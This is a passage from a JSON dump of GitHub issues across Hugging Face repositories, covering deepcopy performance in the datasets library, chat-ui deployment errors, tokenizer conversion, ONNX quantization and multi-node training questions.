hf://datasets/cerebras/SlimPajama-627B@2d0accdd58c5d5511943ca1f5ff0e3eb5e293543\r\nresolve_pattern took 20.815081119537354 seconds\r\n```\r\nMakes sense. How to improve it?\r\n\r\n## Bigger project, biggest payoff\r\n\r\nDatabricks (and consequently, spark) store a compressed manifest file of the files contained in the remote filesystem.\r\nThen, you download one tiny file, decompress it, and all the operations are local instead of this shenanigans.\r\n\r\nIt seems pretty straightforward to make dataset uploads compute a manifest and upload it alongside their data.\r\n\r\nThis would make resolution time so fast that nobody would ever think about it again.\r\nIt also means you either need to have the uploader compute it _every time_, or have a hook that computes it.\r\n\r\n## Smaller project, immediate payoff: Be diligent in avoiding deepcopy\r\n\r\nRevise the _ls_tree method to avoid deepcopy:\r\n```\r\n def _ls_tree(\r\n self,\r\n path: str,\r\n recursive: bool = False,\r\n refresh: bool = False,\r\n revision: Optional[str] = None,\r\n expand_info: bool = True,\r\n ):\r\n ..... omitted .....\r\n for path_info in tree:\r\n if isinstance(path_info, RepoFile):\r\n cache_path_info = {\r\n \"name\": root_path + \"/\" + path_info.path,\r\n \"size\": path_info.size,\r\n \"type\": \"file\",\r\n \"blob_id\": path_info.blob_id,\r\n \"lfs\": path_info.lfs,\r\n \"last_commit\": path_info.last_commit,\r\n \"security\": path_info.security,\r\n }\r\n else:\r\n cache_path_info = {\r\n \"name\": root_path + \"/\" + path_info.path,\r\n \"size\": 0,\r\n \"type\": \"directory\",\r\n \"tree_id\": path_info.tree_id,\r\n \"last_commit\": path_info.last_commit,\r\n }\r\n parent_path = self._parent(cache_path_info[\"name\"])\r\n self.dircache.setdefault(parent_path, []).append(cache_path_info)\r\n out.append(cache_path_info)\r\n return copy.deepcopy(out) # copy to not let users modify the dircache\r\n```\r\nObserve this deepcopy at the end. It is making a copy of a very simple data structure. We do not need to copy. We can simply generate the data structure twice instead. It will be much faster.\r\n```\r\n def _ls_tree(\r\n self,\r\n path: str,\r\n recursive: bool = False,\r\n refresh: bool = False,\r\n revision: Optional[str] = None,\r\n expand_info: bool = True,\r\n ):\r\n ..... omitted .....\r\n def make_cache_path_info(path_info):\r\n if isinstance(path_info, RepoFile):\r\n return {\r\n \"name\": root_path + \"/\" + path_info.path,\r\n \"size\": path_info.size,\r\n \"type\": \"file\",\r\n \"blob_id\": path_info.blob_id,\r\n \"lfs\": path_info.lfs,\r\n \"last_commit\": path_info.last_commit,\r\n \"security\": path_info.security,\r\n }\r\n else:\r\n return {\r\n \"name\": root_path + \"/\" + path_info.path,\r\n \"size\": 0,\r\n \"type\": \"directory\",\r\n \"tree_id\": path_info.tree_id,\r\n \"last_commit\": path_info.last_commit,\r\n }\r\n for path_info in tree:\r\n cache_path_info = make_cache_path_info(path_info)\r\n out_cache_path_info = make_cache_path_info(path_info) # copy to not let users modify the dircache\r\n parent_path = self._parent(cache_path_info[\"name\"])\r\n self.dircache.setdefault(parent_path, []).append(cache_path_info)\r\n out.append(out_cache_path_info)\r\n return out\r\n```\r\nNote there is no longer a deepcopy in this method. We have replaced it with generating the output twice. This is substantially faster. For me, the entire resolution went from 1100s to 360s.\r\n\r\n## Medium project, medium payoff\r\nAfter the above change, we have this profile:\r\n![image](https://github.com/huggingface/datasets/assets/159512661/db7b83da-2dfc-4c2e-abab-0ede9477876c)\r\nFigure 2: x-axis is 355 seconds. Note that globbing and _ls_tree deep copy is gone. No surprise there. It's much faster now, but we still spend ~187seconds i", "url": "https://github.com/huggingface/datasets/issues/6726", "state": "open", "labels": [], "created_at": "2024-03-09T07:08:45Z", "updated_at": "2024-03-09T07:11:08Z", "comments": 2, "user": "awgr" }, { "repo": "huggingface/alignment-handbook", "number": 133, "title": "Early Stopping Issue when used with ConstantLengthDataset", "body": "Hello\r\nI modified the code to include the Constant Length Dataset and it's early stopping at around 15% of the training. This issue doesn't occur when not used with the normal code given. Is there an issue with constant length dataset? I used it with SFTTrainer.", "url": "https://github.com/huggingface/alignment-handbook/issues/133", "state": "open", "labels": [], "created_at": "2024-03-08T23:08:08Z", "updated_at": "2024-03-08T23:08:08Z", "comments": 0, "user": "sankydesai" }, { "repo": "huggingface/transformers.js", "number": 635, "title": "Failed to process file. and Failed to upload.", "body": "### Question\n\nI am hosting Supabase on Docker in Ubuntu, and I am facing file upload failures on the chatbot-ui. The error messages displayed are \"Failed to process file\" and \"Failed to upload.\" The console output error messages are as follows:\r\n\r\n- POST https://chat.example.com/api/retrieval/process 500 (Internal Server Error)\r\n- GET https://supa.example.com/rest/v1/files?select=*&id=eq.5186a7c7-ff34-4a40-98c1-db8d36e47896 406 (Not Acceptable)\r\n\r\nFile uploads fail regardless of the file type - whether it's a file with a purely English filename, a .txt file, or a .docx file. \r\n\r\nAdditionally, registration, login, chatting, and uploading images are functioning properly.", "url": "https://github.com/huggingface/transformers.js/issues/635", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-08T13:07:18Z", "updated_at": "2024-03-08T13:22:57Z", "user": "chawaa" }, { "repo": "huggingface/peft", "number": 1545, "title": "How to use lora finetune moe model", "body": "", "url": "https://github.com/huggingface/peft/issues/1545", "state": "closed", "labels": [], "created_at": "2024-03-08T11:45:09Z", "updated_at": "2024-04-16T15:03:39Z", "user": "Minami-su" }, { "repo": "huggingface/datatrove", "number": 119, "title": "how about make a ray executor to deduplication", "body": "- https://github.com/ChenghaoMou/text-dedup/blob/main/text_dedup/minhash_spark.py\r\n- reference\uff1ahttps://github.com/alibaba/data-juicer/blob/main/data_juicer/core/ray_executor.py\r\n- Ray is simpler and faster than Spark\r\n", "url": "https://github.com/huggingface/datatrove/issues/119", "state": "closed", "labels": [], "created_at": "2024-03-08T11:37:13Z", "updated_at": "2024-04-11T12:48:53Z", "user": "simplew2011" }, { "repo": "huggingface/transformers.js", "number": 634, "title": "For nomic-ai/nomic-embed-text-v1 8192 context length", "body": "### Question\n\nAs per document: https://huggingface.co/nomic-ai/nomic-embed-text-v1\r\n\r\nModel supports 8192 context length, however, in transformers.js model_max_length: 512.\r\n\r\nAny guidance how to use full context (8192) instead of 512?", "url": "https://github.com/huggingface/transformers.js/issues/634", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-08T05:33:39Z", "updated_at": "2025-10-13T04:57:49Z", "user": "faizulhaque" }, { "repo": "huggingface/diffusers", "number": 7254, "title": "Request proper examples on how to training a diffusion models with diffusers on large scale dataset like LAION", "body": "Hi, I do not see any examples in diffusers/examples on how to training a diffusion models with diffusers on large scale dataset like LAION. However, it is important since many works and models is willing integrate their models into diffusers, so if they can train their models in diffusers, it would be more easy when they want to do it.", "url": "https://github.com/huggingface/diffusers/issues/7254", "state": "closed", "labels": [ "stale" ], "created_at": "2024-03-08T01:31:33Z", "updated_at": "2024-06-30T05:27:57Z", "user": "Luciennnnnnn" }, { "repo": "huggingface/swift-transformers", "number": 56, "title": "How to get models?", "body": "Missing in docu?", "url": "https://github.com/huggingface/swift-transformers/issues/56", "state": "closed", "labels": [], "created_at": "2024-03-07T15:47:54Z", "updated_at": "2025-02-11T11:41:32Z", "user": "pannous" }, { "repo": "huggingface/datasets", "number": 6721, "title": "Hi,do you know how to load the dataset from local file now?", "body": " Hi, if I want to load the dataset from local file, then how to specify the configuration name?\r\n\r\n_Originally posted by @WHU-gentle in https://github.com/huggingface/datasets/issues/2976#issuecomment-1333455222_\r\n ", "url": "https://github.com/huggingface/datasets/issues/6721", "state": "open", "labels": [], "created_at": "2024-03-07T13:58:40Z", "updated_at": "2024-03-31T08:09:25Z", "user": "Gera001" }, { "repo": "huggingface/transformers.js", "number": 633, "title": "Is 'aggregation_strategy' parameter available for token classification pipeline?", "body": "### Question\n\nHi. I have question.\r\n\r\nFrom HuggingFace Transformers documentation, they have **'aggregation_strategy'** parameter in token classification pipeline. [Link](https://huggingface.co/docs/transformers/en/main_classes/pipelines#transformers.TokenClassificationPipeline.aggregation_strategy)\r\nNeed to know in this library provide this parameter?\r\n\r\nThanks.\r\n", "url": "https://github.com/huggingface/transformers.js/issues/633", "state": "open", "labels": [ "help wanted", "good first issue", "question" ], "created_at": "2024-03-07T07:02:55Z", "updated_at": "2024-06-09T15:16:56Z", "user": "boat-p" }, { "repo": "huggingface/swift-coreml-diffusers", "number": 93, "title": "Blocked at \"loading\" screen - how to reset the app / cache ?", "body": "After playing a bit with the app, it now stays in \"Loading\" state at startup (see screenshot)\r\n\r\nI tried to remove the cache in `~/Library/Application Support/hf-diffusion-models` but it just cause a re-download.\r\n\r\nHow can I reset the app, delete all files created and start like on a fresh machine again ?\r\n\r\nAlternatively, how can I pass the \"Loading\" screen ?\r\n\r\n\"image\"\r\n", "url": "https://github.com/huggingface/swift-coreml-diffusers/issues/93", "state": "open", "labels": [], "created_at": "2024-03-06T12:50:29Z", "updated_at": "2024-03-10T11:24:49Z", "user": "sebsto" }, { "repo": "huggingface/chat-ui", "number": 905, "title": "Fail to create assistant. ", "body": "I use the docker image chat-ui-db as the frontend, text-generation-inference as the inference backend, and meta-llamaLlama-2-70b-chat-hf as the model. Using the image and model mentioned above, I set up a large language model dialog service on server A. Assume that the IP address of the server A is x.x.x.x.\r\nI use docker compose to deploy it. The content of docker-compose.yml is as follows:\r\n```\r\nservices:\r\n chat-ui:\r\n image: chat-ui-db:latest\r\n ports:\r\n - \"3000:3000\"\r\n restart: unless-stopped\r\n textgen:\r\n image: huggingface/text-generation-inference:1.4\r\n ports:\r\n - \"8080:80\"\r\n command: [\"--model-id\", \"/data/models/meta-llamaLlama-2-70b-chat-hf\"]\r\n volumes:\r\n - /home/test/llm-test/serving/data:/data\r\n deploy:\r\n resources:\r\n reservations:\r\n devices:\r\n - driver: nvidia\r\n count: 8\r\n capabilities: [gpu]\r\n restart: unless-stopped\r\n```\r\nI set ENABLE_ASSISTANTS=true in .env.local to enable assistants feature. \r\nI logged into localhost:3000 using chrome, clicked the settings button, and then clicked the create new assistant button. Enter the information in the Name and Description text boxes, select a model, and enter the information in the User start messages and Instructions (system prompt) text boxes. Finally, click the Create button. I can create an assistant just fine.\r\n\r\nWhen I go to xxxx:3000 from a browser on a different server and access the service. (One may ask, how can I achieve access to server A's services from other servers without logging. The solution is to use nginx as a http to https anti-proxy(https://www.inovex.de/de/blog/code-assistant-how-to-self-host-your-own/)). I clicked the settings button, and then clicked the create new assistant button. Enter the information in the Name and Description text boxes, select a model, and enter the information in the User start messages and Instructions (system prompt) text boxes. Finally, click the Create button. The webpage is not responding. The container logs don't show anything either. I couldn't create an assistant.\r\n\r\nWhat should i do?\r\n\r\nDo I have to enable login authentication to create an assistant? unless I'm accessing it from localhost. I'm on a LAN and I can't get user authentication through Huggingface or google. I have also tried to set up a user authentication service using keycloak and configure .env.local to enable open id login. But the attempt failed. See this page(https://github.com/huggingface/chat-ui/issues/896) for the specific problem. \r\n\r\n\r\n\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/905", "state": "open", "labels": [], "created_at": "2024-03-06T08:33:03Z", "updated_at": "2024-03-06T08:33:03Z", "comments": 0, "user": "majestichou" }, { "repo": "huggingface/chat-ui", "number": 904, "title": "Running the project with `npm run dev`, but it does not hot reload.", "body": "Am I alone in this issue or are you just developing without hot reload? Does anyone have any ideas on how to resolve it?\r\n\r\n**UPDATES:**\r\nIt has to do whenever you're running it on WSL.\r\n\r\nI guess this is an unrelated issue so feel free to close, but would still be nice to know how to resolve this.", "url": "https://github.com/huggingface/chat-ui/issues/904", "state": "closed", "labels": [], "created_at": "2024-03-06T03:34:21Z", "updated_at": "2024-03-06T16:07:11Z", "comments": 2, "user": "CakeCrusher" }, { "repo": "huggingface/dataset-viewer", "number": 2550, "title": "More precise dataset size computation", "body": "Currently, the Hub uses the `/size` endpoint's `num_bytes_original_files` value to display the `Size of downloaded dataset files` on a dataset's card page. However, this value does not consider a possible overlap between the configs' data files (and simply [sums](https://github.com/huggingface/datasets-server/blob/e4aac49c4d3c245cb3c0e48695b7d24a934a8377/services/worker/src/worker/job_runners/dataset/size.py#L97-L98) all the configs' sizes up), in which case the shared files need to be downloaded only once. Both `datasets` and `hfh` recognize this (by downloading them once), so the size computation should account for it, too.\r\n\r\ncc @guipenedo who reported this behavior first", "url": "https://github.com/huggingface/dataset-viewer/issues/2550", "state": "open", "labels": [ "question", "P2" ], "created_at": "2024-03-05T22:22:24Z", "updated_at": "2024-05-24T20:59:36Z", "user": "mariosasko" }, { "repo": "huggingface/datasets", "number": 6719, "title": "Is there any way to solve hanging of IterableDataset using split by node + filtering during inference", "body": "### Describe the bug\n\nI am using an iterable dataset in a multi-node setup, trying to do training/inference while filtering the data on the fly. I usually do not use `split_dataset_by_node` but it is very slow using the IterableDatasetShard in `accelerate` and `transformers`. When I filter after applying `split_dataset_by_node`, it results in shards that are not equal sizes due to unequal samples filtered from each one. \r\n\r\nThe distributed process hangs when trying to accomplish this. Is there any way to resolve this or is it impossible to implement?\r\n\r\n\n\n### Steps to reproduce the bug\n\nHere is a toy example of what I am trying to do that reproduces the behavior\r\n\r\n```\r\n# torchrun --nproc-per-node 2 file.py\r\n\r\n\r\nimport os\r\n\r\nimport pandas as pd\r\nimport torch\r\nfrom accelerate import Accelerator\r\nfrom datasets import Features, Value, load_dataset\r\nfrom datasets.distributed import split_dataset_by_node\r\nfrom torch.utils.data import DataLoader\r\n\r\naccelerator = Accelerator(device_placement=True, dispatch_batches=False)\r\nif accelerator.is_main_process:\r\n if not os.path.exists(\"scratch_data\"):\r\n os.mkdir(\"scratch_data\")\r\n\r\n n_shards = 4\r\n for i in range(n_shards):\r\n df = pd.DataFrame({\"id\": list(range(10 * i, 10 * (i + 1)))})\r\n df.to_parquet(f\"scratch_data/shard_{i}.parquet\")\r\n\r\n\r\nworld_size = accelerator.num_processes\r\nlocal_rank = accelerator.process_index\r\n\r\n\r\ndef collate_fn(examples):\r\n input_ids = []\r\n for example in examples:\r\n input_ids.append(example[\"id\"])\r\n return torch.LongTensor(input_ids)\r\n\r\n\r\ndataset = load_dataset(\r\n \"parquet\", data_dir=\"scratch_data\", split=\"train\", streaming=True\r\n)\r\ndataset = (\r\n split_dataset_by_node(dataset, rank=local_rank, world_size=world_size)\r\n .filter(lambda x: x[\"id\"] < 35)\r\n .shuffle(seed=42, buffer_size=100)\r\n)\r\n\r\nbatch_size = 2\r\ntrain_dataloader = DataLoader(\r\n dataset,\r\n batch_size=batch_size,\r\n collate_fn=collate_fn,\r\n num_workers=2\r\n) \r\n\r\nfor x in train_dataloader:\r\n x = x.to(accelerator.device)\r\n print({\"rank\": local_rank, \"id\": x})\r\n \r\n y = accelerator.gather_for_metrics(x)\r\n if accelerator.is_main_process:\r\n print(\"gathered\", y)\r\n\r\n\r\n```\n\n### Expected behavior\n\nIs there any way to continue training/inference on the GPUs that have remaining data left without waiting for the others? Is it impossible to filter when \n\n### Environment info\n\n- `datasets` version: 2.18.0\r\n- Platform: Linux-5.10.209-198.812.amzn2.x86_64-x86_64-with-glibc2.31\r\n- Python version: 3.10.13\r\n- `huggingface_hub` version: 0.21.3\r\n- PyArrow version: 15.0.0\r\n- Pandas version: 2.2.1\r\n- `fsspec` version: 2023.6.0", "url": "https://github.com/huggingface/datasets/issues/6719", "state": "open", "labels": [], "created_at": "2024-03-05T15:55:13Z", "updated_at": "2024-03-05T15:55:13Z", "comments": 0, "user": "ssharpe42" }, { "repo": "huggingface/chat-ui", "number": 899, "title": "Bug--Llama-2-70b-chat-hf error: `truncate` must be strictly positive and less than 1024. Given: 3072", "body": "I use the docker image chat-ui-db as the frontend, text-generation-inference as the inference backend, and meta-llamaLlama-2-70b-chat-hf as the model.\r\nIn the model field of the .env.local file, I have the following settings\r\n```\r\nMODELS=`[\r\n {\r\n \"name\": \"meta-llama/Llama-2-70b-chat-hf\",\r\n \"endpoints\": [{\r\n \"type\" : \"tgi\",\r\n \"url\": \"http://textgen:80\",\r\n }],\r\n \"preprompt\": \" \",\r\n \"chatPromptTemplate\" : \"[INST] <>\\n{{preprompt}}\\n<>\\n\\n{{#each messages}}{{#ifUser}}{{content}} [/INST] {{/ifUser}}{{#ifAssistant}}{{content}} [INST] {{/ifAssistant}}{{/each}}\",\r\n \"promptExamples\": [\r\n {\r\n \"title\": \"Write an email from bullet list\",\r\n \"prompt\": \"As a restaurant owner, write a professional email to the supplier to get these products every week: \\n\\n- Wine (x10)\\n- Eggs (x24)\\n- Bread (x12)\"\r\n }, {\r\n \"title\": \"Code a snake game\",\r\n \"prompt\": \"Code a basic snake game in python, give explanations for each step.\"\r\n }, {\r\n \"title\": \"Assist in a task\",\r\n \"prompt\": \"How do I make a delicious lemon cheesecake?\"\r\n }\r\n ],\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 3072,\r\n \"max_new_tokens\": 1024,\r\n \"stop\" : [\"\", \"[INST]\"]\r\n }\r\n }\r\n]`\r\n```\r\nThis setting is the same as the setting for Llama-2-70b-chat-hf in the .env.template file in the chat-ui repository.\r\nThen I type the question in the input box. An error has occurred.\r\nThe following error information is found in the log:\r\n```\r\ntextgen | 2024-03-05T20:00:38.883413Z ERROR compat_generate{default_return_full_text=false compute_type=Extension(ComputeType(\"8-nvidia-a100-sxm4-40gb\"))}:generate_stream{parameters=GenerateParameters { best_of: None, temperature: Some(0.1), repetition_penalty: Some(1.2), frequency_penalty: None, top_k: Some(50), top_p: Some(0.95), typical_p: None, do_sample: false, max_new_tokens: Some(1024), return_full_text: Some(false), stop: [\"\", \"[INST]\"], truncate: Some(3072), watermark: false, details: false, decoder_input_details: false, seed: None, top_n_tokens: None, grammar: None }}:async_stream:generate_stream: text_generation_router::infer: router/src/infer.rs:123: `truncate` must be strictly positive and less than 1024. Given: 3072\r\nchat-ui | Error: Input validation error: `truncate` must be strictly positive and less than 1024. Given: 3072\r\nchat-ui | at streamingRequest (file:///app/node_modules/@huggingface/inference/dist/index.mjs:323:19)\r\nchat-ui | at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\nchat-ui | at async textGenerationStream (file:///app/node_modules/@huggingface/inference/dist/index.mjs:673:3)\r\nchat-ui | at async generateFromDefaultEndpoint (file:///app/.svelte-kit/output/server/entries/endpoints/conversation/_id_/_server.ts.js:39:20)\r\nchat-ui | at async summarize (file:///app/.svelte-kit/output/server/entries/endpoints/conversation/_id_/_server.ts.js:287:10)\r\nchat-ui | at async file:///app/.svelte-kit/output/server/entries/endpoints/conversation/_id_/_server.ts.js:607:26\r\ntextgen | 2024-03-05T20:00:38.910266Z ERROR compat_generate{default_return_full_text=false compute_type=Extension(ComputeType(\"8-nvidia-a100-sxm4-40gb\"))}:generate_stream{parameters=GenerateParameters { best_of: None, temperature: Some(0.1), repetition_penalty: Some(1.2), frequency_penalty: None, top_k: Some(50), top_p: Some(0.95), typical_p: None, do_sample: false, max_new_tokens: Some(1024), return_full_text: Some(false), stop: [\"\", \"[INST]\"], truncate: Some(3072), watermark: false, details: false, decoder_input_details: false, seed: None, top_n_tokens: None, grammar: None }}:async_stream:generate_stream: text_generation_router::infer: router/src/infer.rs:123: `truncate` must be strictly positive and less than 1024. Given: 3072\r\n```\r\nI set \"truncate\" to 1000, everything is ok.\r\n**\"truncate\" for Llama-2-70b-chat-hf in the .env.template file in the chat-ui repository is 3072. I think the 3072 should work fine. I don't know how webpage https://huggingface.co/chat/ sets this parameter.**\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/899", "state": "open", "labels": [ "support", "models" ], "created_at": "2024-03-05T12:27:45Z", "updated_at": "2024-03-06T00:59:10Z", "comments": 4, "user": "majestichou" }, { "repo": "huggingface/tokenizers", "number": 1468, "title": "How to convert tokenizers.tokenizer to XXTokenizerFast in transformers?", "body": "### Motivation\r\nI followed the guide [build-a-tokenizer-from-scratch](https://huggingface.co/docs/tokenizers/quicktour#build-a-tokenizer-from-scratch) and got a single tokenizer.json from my corpus. Since I'm not sure if it is compatible with the trainer, I want to convert it back to XXTokenizerFast in transformers.\r\n### Observation\r\nIn [llama2-7b-hf](https://huggingface.co/meta-llama/Llama-2-7b-hf/tree/main), tokenizer file seems consist of \r\n[tokenizer.json](https://huggingface.co/meta-llama/Llama-2-7b-hf/blob/main/tokenizer.json) \u2705 I have \r\n[tokenizer.model](https://huggingface.co/meta-llama/Llama-2-7b-hf/blob/main/tokenizer.model) \u2716 I don't have, not sure its usage\r\n[tokenizer_config.json](https://huggingface.co/meta-llama/Llama-2-7b-hf/blob/main/tokenizer_config.json) \u2716 I don't have, but this looks like not that important. I can manually set this.\r\nInitialize a LlamaTokenizerFast from scratch through \\_\\_init\\_\\_ function seems to require tokenizer.model and tokenizer.json, but I don't get a tokenizer.model.\r\n```\r\ndef __init__(\r\n self,\r\n vocab_file=None,\r\n tokenizer_file=None,\r\n clean_up_tokenization_spaces=False,\r\n unk_token=\"\",\r\n bos_token=\"\",\r\n eos_token=\"\",\r\n add_bos_token=True,\r\n add_eos_token=False,\r\n use_default_system_prompt=False,\r\n add_prefix_space=None,\r\n **kwargs,\r\n ):\r\n```\r\nAfter dive deeper in [transformers.PreTrainedTokenizerFast._save_pretrained](https://github.com/huggingface/transformers/blob/4fc708f98c9c8d5cb48e8a2639e3f7a21c65802f/src/transformers/tokenization_utils_fast.py#L678), I found a code snippet in which fastTokenizer in transformers seems save tokenizer.json only without tokenizer.model\r\n```\r\nif save_fast:\r\n tokenizer_file = os.path.join(\r\n save_directory, (filename_prefix + \"-\" if filename_prefix else \"\") + TOKENIZER_FILE\r\n )\r\n self.backend_tokenizer.save(tokenizer_file)\r\n file_names = file_names + (tokenizer_file,)\r\n```\r\n### Trial\r\nSo I just typically use xxTokenizerFast.from_pretrained('dir_contained_my_tokenizer.json'), and it works with default config, I can modified it manually and save_pretrained to get tokenizer_config.json\r\n### Query\r\nI still have some query needed help.\r\n1. What's the role of tokenizer.model? Is it a subset of tokenizer.json ?\r\n2. Is my conversion method correct ? or is there any better method?", "url": "https://github.com/huggingface/tokenizers/issues/1468", "state": "closed", "labels": [ "Stale", "planned" ], "created_at": "2024-03-05T06:32:27Z", "updated_at": "2024-07-21T01:57:17Z", "user": "rangehow" }, { "repo": "huggingface/gsplat.js", "number": 71, "title": "How to support VR?", "body": "It's great to be able to use vr on a vr device.", "url": "https://github.com/huggingface/gsplat.js/issues/71", "state": "closed", "labels": [], "created_at": "2024-03-05T05:03:17Z", "updated_at": "2024-03-05T07:55:53Z", "user": "did66" }, { "repo": "huggingface/tgi-gaudi", "number": 95, "title": "How to use FP8 feature in TGI-gaudi", "body": "### System Info\n\nThe FP8 quantization feature has been incorporated into the TGI-Gaudi branch. However, guidance is needed on how to utilize this feature. The process involves running the FP8 quantization through Measurement Mode and Quantization Mode. How to enable FP8 using the TGI 'docker run' command? Could you kindly provide a step-by-step guide on utilizing this feature?\"\n\n### Information\n\n- [ ] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [ ] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\nRun the FP8 quantization feature using \"docker run\" command.\n\n### Expected behavior\n\nA clear guide can be provided to use the FP8 quantization feature.", "url": "https://github.com/huggingface/tgi-gaudi/issues/95", "state": "closed", "labels": [], "created_at": "2024-03-05T02:50:08Z", "updated_at": "2024-05-06T09:03:15Z", "user": "lvliang-intel" }, { "repo": "huggingface/accelerate", "number": 2521, "title": "how to set `num_processes` in multi-node training", "body": "Is it the total num of gpus or the number of gpus on a single node?\r\nI have seen contradictory signals in the code.\r\n\r\nhttps://github.com/huggingface/accelerate/blob/ee004674b9560976688e1a701b6d3650a09b2100/docs/source/usage_guides/ipex.md?plain=1#L139 https://github.com/huggingface/accelerate/blob/ee004674b9560976688e1a701b6d3650a09b2100/src/accelerate/state.py#L154\r\n here, it seems like the total number of gpus.\r\n\r\nhttps://github.com/huggingface/accelerate/blob/ee004674b9560976688e1a701b6d3650a09b2100/examples/slurm/submit_multigpu.sh#L27\r\nhere, it sees like the number of gpus per node.", "url": "https://github.com/huggingface/accelerate/issues/2521", "state": "closed", "labels": [], "created_at": "2024-03-04T13:03:57Z", "updated_at": "2025-12-22T01:53:32Z", "user": "lxww302" }, { "repo": "huggingface/distil-whisper", "number": 95, "title": "How to use distil-whisper-large-v3-de-kd model from HF?", "body": "Officially, multi-language support is still not implemented in distil-whisper.\r\n\r\nBut I noticed, that the esteemed @sanchit-gandhi uploaded a German model for distil-whisper to HuggingFace, called 'distil-whisper-large-v3-de-kd'\r\n\r\nHow can I use this specific model for transcribing something? ", "url": "https://github.com/huggingface/distil-whisper/issues/95", "state": "open", "labels": [], "created_at": "2024-03-04T12:01:13Z", "updated_at": "2024-04-02T09:40:46Z", "user": "Arche151" }, { "repo": "huggingface/transformers.js", "number": 623, "title": "Converted QA model answers in lower case, original model does not. What am I doing wrong?", "body": "### Question\n\nI have converted [deutsche-telekom/electra-base-de-squad2](https://huggingface.co/deutsche-telekom/electra-base-de-squad2) to ONNX using ```python -m scripts.convert --quantize --model_id deutsche-telekom/electra-base-de-squad2```. The ONNX model, used with the same code, yields returns in lower case, whereas the original model returns the answer respecting case sensitivity. I noticed that the ```tokenizer_config.json\" in the original model contains ```\"do_lower_case\": false```. But even setting this to ```true``` before converting does not work. What am I dpoing wrong?\r\n\r\nCode is straight forward:\r\n\r\n```javascript\r\nimport { pipeline } from '@xenova/transformers';\r\nconst pipe = await pipeline('question-answering', 'conventic/electra-base-de-squad2-onnx');\r\nconst context = \"\";\r\nconst question = \"\";\r\nconst out = await pipe(question, context);\r\nconsole.log(out);\r\n\u00b4\u00b4\u00b4", "url": "https://github.com/huggingface/transformers.js/issues/623", "state": "open", "labels": [ "question" ], "created_at": "2024-03-04T11:56:44Z", "updated_at": "2024-03-04T11:56:44Z", "user": "MarceloEmmerich" }, { "repo": "huggingface/transformers.js", "number": 618, "title": "How do I convert a DistilBERT Model to Quantized ONNX -", "body": "### Question\n\nNote, https://huggingface.co/docs/transformers.js/en/index#convert-your-models-to-onnx is a broken link.\r\n\r\nI have a simple DistilBERT model I'm trying to load with the examples/next-server (wdavies/public-question-in-text)\r\n\r\nI tried the simplest version of converting to ONNX (wdavies/public-onnx-test following https://huggingface.co/docs/transformers/en/serialization#exporting-a--transformers-model-to-onnx-with-optimumonnxruntime), but I'm still getting an error message saying its looking for quantized_onnx. \r\n\r\nAccording to all I can see, including this blog post, you seem to have choose a specific hardware architecture? Is this true? How will I know what the client browser (or even mine) is running on? Help? I just want to run this simple model in example/next-server ?\r\n\r\nhttps://huggingface.co/blog/optimum-inference#34-use-the-ortquantizer-to-apply-dynamic-quantization \r\n", "url": "https://github.com/huggingface/transformers.js/issues/618", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-01T16:55:16Z", "updated_at": "2024-03-02T00:47:40Z", "user": "davies-w" }, { "repo": "huggingface/sentence-transformers", "number": 2521, "title": "Is the implementation of `MultipleNegativesRankingLoss` right?", "body": "It is confusing why the labels are `range(len(scores))`.\r\n```python\r\nclass MultipleNegativesRankingLoss(nn.Module):\r\n def __init__(self, model: SentenceTransformer, scale: float = 20.0, similarity_fct=util.cos_sim):\r\n super(MultipleNegativesRankingLoss, self).__init__()\r\n self.model = model\r\n self.scale = scale\r\n self.similarity_fct = similarity_fct\r\n self.cross_entropy_loss = nn.CrossEntropyLoss()\r\n\r\n def forward(self, sentence_features: Iterable[Dict[str, Tensor]], labels: Tensor):\r\n reps = [self.model(sentence_feature)[\"sentence_embedding\"] for sentence_feature in sentence_features]\r\n embeddings_a = reps[0]\r\n embeddings_b = torch.cat(reps[1:])\r\n\r\n scores = self.similarity_fct(embeddings_a, embeddings_b) * self.scale\r\n labels = torch.tensor(\r\n range(len(scores)), dtype=torch.long, device=scores.device\r\n ) # Example a[i] should match with b[i]\r\n return self.cross_entropy_loss(scores, labels)\r\n\r\n def get_config_dict(self):\r\n return {\"scale\": self.scale, \"similarity_fct\": self.similarity_fct.__name__}\r\n```", "url": "https://github.com/huggingface/sentence-transformers/issues/2521", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-01T10:13:35Z", "updated_at": "2024-03-04T07:01:12Z", "user": "ghost" }, { "repo": "huggingface/text-embeddings-inference", "number": 178, "title": "How to specify a local model", "body": "### Feature request\n\nmodel=BAAI/bge-reranker-large\r\nvolume=$PWD/data\r\ndocker run -p 8080:80 -v $volume:/data --pull always ghcr.io/huggingface/text-embeddings-inference:cpu-1.0 --model-id $model\n\n### Motivation\n\nmodel=BAAI/bge-reranker-large\r\nvolume=$PWD/data\r\ndocker run -p 8080:80 -v $volume:/data --pull always ghcr.io/huggingface/text-embeddings-inference:cpu-1.0 --model-id $model\n\n### Your contribution\n\nnull", "url": "https://github.com/huggingface/text-embeddings-inference/issues/178", "state": "closed", "labels": [], "created_at": "2024-03-01T09:40:07Z", "updated_at": "2024-03-01T16:54:27Z", "user": "yuanjie-ai" }, { "repo": "huggingface/chat-ui", "number": 889, "title": "How does huggingchat prompt the model to generate HTML output?", "body": "How does Huggingchat prompt the LLM to generate HTML output? Where can I find that prompt? I'd like to tweak it. thanks!", "url": "https://github.com/huggingface/chat-ui/issues/889", "state": "open", "labels": [], "created_at": "2024-02-29T17:20:01Z", "updated_at": "2024-03-05T18:45:56Z", "user": "vgoklani" }, { "repo": "huggingface/chat-ui", "number": 888, "title": "Code LLAMA doesn't work", "body": "I am simply entering this prompt:\r\n\r\n```\r\nYou're given the following regex in python: \\| *([^|]+?) *\\|\r\n\r\nThis captures text values in markdown tables but fails to capture numbers. Update this regex to capture numbers as well\r\n```\r\n\r\nThen what happens is that my 1 core of CPU is used 100% for at least for 5 mins until I close the browser. Not sure what is going on?\r\n\r\nSame prompt works when I use the Mistral 8 X 7B", "url": "https://github.com/huggingface/chat-ui/issues/888", "state": "closed", "labels": [], 